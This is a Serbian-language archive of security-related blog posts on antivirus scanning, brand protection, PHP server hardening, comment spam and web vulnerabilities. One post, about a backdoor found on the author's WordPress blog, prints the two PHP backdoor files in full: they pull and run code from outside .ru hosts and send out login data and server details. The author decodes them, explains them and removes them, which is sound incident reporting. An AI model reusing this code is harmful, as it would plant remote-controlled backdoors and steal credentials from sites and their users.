Архива за 'Zaštita' категорију

Virustotal: spas od virusa u poslednji čas

February 28, 2010

Antivirusni programi su danas obavezni alat na svakom računaru. Retki su računari koji nemaju nikakvu antivirusnu zaštitu.

Upotreba antivirusnog programa može da pomogne u nekoj meri , ali ti programi nisu svemoćni. Tehnologije koje danas virusi koriste sve više otežavaju njihovo prepoznavanje i sprečavanje aktiviranja.

Zbog toga se često dešava da jedan antivirusni program prepoznaje jedan virus a drugi ne, ali često bude i obrnuto, da ovaj drugi prepozunaje neki drugi virus koji prvi ne prepoznaje. Ideja da se na računaru drži više aktivnih antivirusnih programa nije dobra, jer se oni po pravilu ne trpe i smetaju jedan drugome.

 […]

Geek Jeans i zaštita Brenda-dizajna

December 16, 2009

Izgleda da sam zaboravio kako izgleda business u offline svetu :) Razmišljao sam o 100 detalja u vezi Geek Jeansa, ali jedan od najbitnijih sam skroz predvideo, zaštita Brenda i dizajna pri proizvodnji ;) Juče sam krenuo da skupljam svu dokumentaciju i da upijam informacije oko svega toga. Iskreno najviše bi voleo da postoji neka CC licenca i za takve stvari, ali stvari su mnogo drugačije nego u online svetu.

Priča je (otkrivam toplu vodu) što se situacije tiče ukratko sledeća. Posebno se zaštićuje Brend, pa logo, pa dizajn za svaki model. Prvo se zaštićuje u zemlji gde vam je business, a kasnije ako želite i internacionalno. Svaka navedena stvar se zaštićuje u više željenih industrijskih klasi (garderoba, prehrana, hemijski proizvodi itd.). Interesantno je da kada idete na internacionalnu zaštitu, za svaku zemlju posebno plaćate kao i za željenu klasu u svakoj zemlji ;)

Neću ulaziti sada u detalje svega ovoga gore navedenog, ali kada se podvuče neka crta i ide sa pretpostavkom da se dobro “obezbedite” štiteći svoj brend i dva Jeans modela recimo, potrebne su vam sume novca od par stotina hiljada evra. I to sve za šta? Pa za to da se vaš proizvod može pronaći na lokalnoj pijaci u sred Pariza bez problema izkopiran gotovo do detalja od nekog kineskog proizvođača pod nekim drugim imenom. Ceo sistem mi jako smrdi…

Na pamet mi padaju gomile pitanja… Zašto bih plaćao nekome uslugu jebeno skupo, a taj istu ne može da mi pruži nego ja kasnije moram da dam još novca advokatima da bi se izborio samo za delić iste?? I to sve dok se ne pojavi neko drugi sa istom idejom o kopiranju…

OK, regovaću brend i logo recimo, za to mi relativno mogu pomoći da se zaštitim. A kako planiram da budem uglavnom online prisutan, a imam i svoje domene već kupljene oko tog businessa tu ne rizikujem gotovo ništa. Ali zašto bih plaćao zaštitu dizajna kada mi ustanova koju plaćam za to i tako ne može garantovati da će me spasiti kopija? Pa Kinezi su iPhone iskopirali do detalja pa još u njemu dodali i brdo opcija kojih nema ni u samom originalu – neki kažu bolji je od originala ima TV u njemu :) Naravno, aparat se ne zove iPhone, niti to jeste, ali oba proizvoda pronalaze svoju publiku.

Šta uopte rizikujem ako ne zaštitim recimo dizajn modela? OK, može bilo ko da ga kopira, ali to ne može da stave pod mojom markom, ne? Što je i Denis rekao, pa i te kopije daju neki šarm.

Rado bih nekako napravio neki jeans model pod CC licencom :)

Btw. odoh sada da zaštitim Brend koji sam juče odabrao, za ovo imam još malo vremena da razmislim..

Neka prava na ovaj tekst su zadržana, 2009 Blogowski blog. Svi objavljeni radovi na Blogowski.eu su njegovo vlasništvo, osim ako nije drugačije napisano, i nalaze se pod Creative Commons Attribution 2.5 Licencom. Ukoliko koristite RSS kanale sa ovog bloga, proverite da li se slažete sa uslovima korištenja. Uslovi korištenja RSS kanala

Neće mene trojanci - malo sutra

August 21, 2009

Došao je i taj dan da mene smlati trojanac. Ošašavio me je ko mladog majmuna i još uvek ne znam šta se dogodilo.

Sinoć su počeli ljudi da mi prijavljuju za par sajtova da im Firefox prijavljuje da su opasni i ne dozvoljava pristup. Nisam se iznenadio, jer sam nedelju dana ranije već otkrio trojanca koji je napao četiri sajta koje […]

Koliko je siguran PHP na vašem veb serveru?

June 1, 2009

Prilikom izrade sajtova, ono o čemu se često najmanje misli je sigurnost servera. Nažalost, vrlo je lako u PHP-u napraviti neku rupu preko koje napadač može da zloupotrebi sajt, odnosno server na kome je on postavljen.

Najvažnije je da je sam server podešen tako dje upad otežan ili onemogućen. Kako postoji mnogo načina da se upad izvede teško je sve to pratiti i proveravati.

U nastojanju da se posao provere olakša, PHP Security Consortium je objavio PHP skript PhpSecInfo koji proverava kako je sam PHP podešen i upozorava na moguće slabosti. Skript se koristi na sličan način kao i PHP funkcija phpinfo().

Ovaj skript ne pronalazi greške u vašem PHP programu, već proverava sam server, odnosno podešavanje PHP okruženja na serveru. Kada naiđe na neko…

Backdoor na bRlogu?

September 11, 2008

Upadnem malopre sasvim slučajno u svoj wp-contents/uploads/ folder, kad ima šta i da vidim tamo: Dva PHP fajla, jedan base.php i jedan create.php, kao i jedan .htaccess fajl koji usmerava sve 404 greške na create.php. Budem radoznao, otvorim ih kad ono “obfuscated” kod, odnosno nije toliko obfuscated koliko je sve napisano u jednom redu. Ne budem lenj, otvorim ih preko PHPEdit-a koji sam dobio ranije (i za koji sam još uvek dužan da napišem review), odradim ctrl+shift+f (code beautifier) i dobijem lepo ispisan kod:

base.php

error_reporting(0); if (isset($_POST["l"]) and isset($_POST["p"])) {         if (isset($_POST["input"])) {                 $user_auth = "&l=" . base64_encode($_POST["l"]) . "&p=" . base64_encode(md5($_POST["p"]));         } else {                 $user_auth = "&l=" . $_POST["l"] . "&p=" . $_POST["p"];         } } else {         $user_auth = ""; } if (!isset($_POST["log_flg"])) {         $log_flg = "&log"; } if (!@include_once(base64_decode("aHR0cDovLw==") . "hegfzzazbzbcd" . base64_decode("LnVzZXJzLmJpc2hlbGwucnU=") . "/?r_addr=" . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) . "&url=" . base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg)) {         if ($_POST["l"] == "special") {                 print "sys_active" . `uname -a`;         } }

create.php

error_reporting(0); $s = "e"; $a = (isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b = (isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c = (isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $d = (isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF); $e = (isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING); $f = (isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $g = (isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h = (isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $str = base64_encode($a) . "." . base64_encode($b) . "." . base64_encode($c) . "." . base64_encode($d) . "." . base64_encode($e) . "." . base64_encode($f) . "." . base64_encode($g) . "." . base64_encode($h) . ".$s"; if ((include(base64_decode("aHR0cDovLw==") . "hegfzzazbzbcd" . base64_decode("LnVzZXJzLnBocGZyZWUucnU=") . "/?" . $str))) { } else {         include(base64_decode("aHR0cDovLw==") . "hegfzzazbzbcd" . base64_decode("LnVzZXJzLnBocGNvZGluZy5ydQ==") . "/?" . $str); }

Sve ovo što je base64_decode echo-ujem i vidim da je skripta napravljena da cross-site inkluduje u ovu skriptu štagod joj se prosledi sa http://hegfzzazbzbcd.users.phpfree.ru/, odnosno sa  http://hegfzzazbzbcd.users.phpcoding.ru ako ne uspe sa ove prve adrese - klasičan backdoor. Nemam pojma od kad to stoji na blogu, niti imam pojma otkud to kod mene u uploads/ folderu, i čudim se kako do sad bRlog nije deface-ovan, ali sad i da hoće neko preko toga da ga deface-uje - ne može, jer sam izbrisao skripte, i sprečio izvršavanje php skripti u uploads/ folderu.

A sad me izvin’te, odoh da proverim ostale blogove, što savetujem i vama.

Akismet čuva InterestingFacts

August 19, 2008

Nije me bilo neko vreme… došao sam sa mora, nisam, naravno, pocrneo, jer ne volim sunčanje, i tako to… u principu me mrzi da sad prepričavam neke događaje, a par fotki imate kod mene na MySpace-u, pa ih možete videti tamo. Sve u svemu, bilo je lepo, nisam imao nikakvih problema u CG, obišao sam sve od Herceg Novog do Ade Bojane i super se proveo.

Međutim, kad sam se vratio zatekao sam preko 2000 SPAM komentara na InterestingFacts.org. Očigledno je ona CAPTCHA beskorisna (a kako i ne bi bila kad nema nikakvog deformisanja slike?)… note to myself - izbaci kepču. Nije mi bio problem da uklonim te spam komentare jer su se prilično šablonski pojavljivali, tako da sam sa pet-šest MySQL kverija očistio bazu od spama. Ali, problem je predstavljalo to što se spam botovi nikako nisu zaustavljali. Za dva dana sam skupljao po 2000 spam komentara. Poslednji talas je bio večeras kad sam par minuta posle čišćenja baze video desetak novih spam komentara u bazi. No, setih se Akismet-a kojim sam zaštitio ovaj i sve ostale blogove koje održavam, nađoh neku gotovu PHP klasu za Akismet i eto, od ovog jutra Akismet čuva Interesting Facts. Testirao sam ga sa normalnim komentarom i jednim “buy cheap viagra” komentarom, i pokazao se kao prilično uspešan. Takođe, nisam se mnogo trudio oko implementacije zaštite tako da se sumnjivi komentari ne zadržavaju za moderaciju već se odmah odbacuju. Ako budem saznao da dosta greši (mada po iskustvima sa Wordpress-om - ne greši dosta) uvešću i tako nešto, no neću sada o tome.

Inače, danas sam prijavio tri ispita za septembarski rok i nadam se da ću naći vremena da ih spremim, ali kako je Instant Update 3 u završnoj fazi izrade (tačnije gotov je, treba ga samo spakovati za release)  a i Beer Fest nam se približava - teško.

Preko 70% web sajtova nije bezbedno

February 15, 2007

Prema nekim rezultatima Acunetix-a 70% svih sajtova koji su oni skenirali su podložni hakerskim upadima. U proseku 91% ovih web sajtova imaju neki propust, od onih ozbiljnijih poput SQL Injection i Cross Site Scripting do manje opasnih kao što je otvoreni listing direktorijuma i slično.

Od totalnih 210 000 propusta skeniranih sajtova, nađeno je oko 66 propusta po web sajtu, što je veoma alarmantna činjenica, izgleda da se danas sve manje pažnje obraća ka bezbednosti web aplikacija. Ali i taj broj koji je objavljen deluje malo, ako u nekoj aplikaciji nije nađen nijedan propust ne znači da taj web sajt siguran.

Da, možda je malo ironično da kompanija koja profitira od (ne)sigurnosti web sajtova objavljuje takve rezultate, ali još je sarkastičnije (postoji li ova reč?) je što je ista ta kompanija je bila podložna XSS napadu. Acunetix je sve sajtove automatski skenirao za poznate propuste, što znači da bi broj bio još mnogo veći da je to sve rađeno ručno, sigurnost na internetu ? hmm... ne bih rek'o.

Napad na Internet !

February 8, 2007

Firefox prikazuje drugačije sačuvane strane

February 2, 2007

Google-ov anti-phishing plugin nije bezbedan

January 25, 2007